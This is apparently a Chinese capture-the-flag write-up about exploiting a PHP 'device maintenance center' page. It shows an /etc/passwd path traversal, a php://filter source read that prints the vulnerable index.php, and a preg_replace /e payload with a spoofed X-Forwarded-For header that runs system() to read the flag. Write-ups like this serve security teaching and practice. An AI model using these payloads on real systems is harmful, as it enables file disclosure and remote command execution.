和之前的isc-06是一个模板,不同的是这次能点进去的网站不一样了,这次是设备维护中心可以进入。
进去之后,查看源码,并没有发现东西。一通乱点之后,发现当点击左上角标题时,url会变成index.php?page=index,并且网页下方出现index字样。
那么情况就很明朗了,先试试读取/etc/passwd的内容
index.php?page=../../../../../../../etc/passwd

然后尝试php://input看看能不能命令执行,但是并没有任何反应。
接着使用php://filter,php://filter/read=convert.base64-encode/resource=index.php,这次成功读取到了index.php的内容,解码之后:
<?phperror_reporting(0);@session_start();posix_setuid(1000);?><!DOCTYPE HTML><html><head><meta charset="utf-8"><meta name="renderer" content="webkit"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><link rel="stylesheet" href="layui/css/layui.css" media="all"><title>设备维护中心</title><meta charset="utf-8"></head><body><ul class="layui-nav"><li class="layui-nav-item layui-this"><a href="?page=index">云平台设备维护中心</a></li></ul><fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;"><legend>设备列表</legend></fieldset><table class="layui-hide" id="test"></table><script type="text/html" id="switchTpl"><!-- 这里的 checked 的状态只是演示 --><input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}></script><script src="layui/layui.js" charset="utf-8"></script><script>layui.use('table', function() {var table = layui.table,form = layui.form;table.render({elem: '#test',url: '/somrthing.json',cellMinWidth: 80,cols: [[{ type: 'numbers' },{ type: 'checkbox' },{ field: 'id', title: 'ID', width: 100, unresize: true, sort: true },{ field: 'name', title: '设备名', templet: '#nameTpl' },{ field: 'area', title: '区域' },{ field: 'status', title: '维护状态', minWidth: 120, sort: true },{ field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true }]],page: true});});</script><script>layui.use('element', function() {var element = layui.element; //导航的hover效果、二级菜单等功能,需要依赖element模块//监听导航点击element.on('nav(demo)', function(elem) {//console.log(elem)layer.msg(elem.text());});});</script><?php$page = $_GET[page];if (isset($page)) {if (ctype_alnum($page)) {?><br /><br /><br /><br /><div style="text-align:center"><p class="lead"><?php echo $page; die();?></p><br /><br /><br /><br /><?php}else{?><br /><br /><br /><br /><div style="text-align:center"><p class="lead"><?phpif (strpos($page, 'input') > 0) {die();}if (strpos($page, 'ta:text') > 0) {die();}if (strpos($page, 'text') > 0) {die();}if ($page === 'index.php') {die('Ok');}include($page);die();?></p><br /><br /><br /><br /><?php}}//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {echo "<br >Welcome My Admin ! <br >";$pattern = $_GET[pat];$replacement = $_GET[rep];$subject = $_GET[sub];if (isset($pattern) && isset($replacement) && isset($subject)) {preg_replace($pattern, $replacement, $subject);}else{die();}}?></body></html>
看到这里就知道了,input、ta:text、text、index.php都被过滤了。
接着看到了所谓的后门:
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {echo "<br >Welcome My Admin ! <br >";$pattern = $_GET[pat];$replacement = $_GET[rep];$subject = $_GET[sub];if (isset($pattern) && isset($replacement) && isset($subject)) {preg_replace($pattern, $replacement, $subject);}else{die();}}
这一段代码要利用,需要伪造HTTP_X_FORWARDED_FOR为127.0.0.1。至于下面的preg_replace,如果$pattern里面有/e标记,那么$replacement就会被当成php代码执行,而$pattern、$replacement、$subject正好是我们所控制的,构造payload:
/index.php?pat=/a/e&rep=system("cat%20s3chahahaDir/flag/flag.php")&sub=abc
成功得到flag
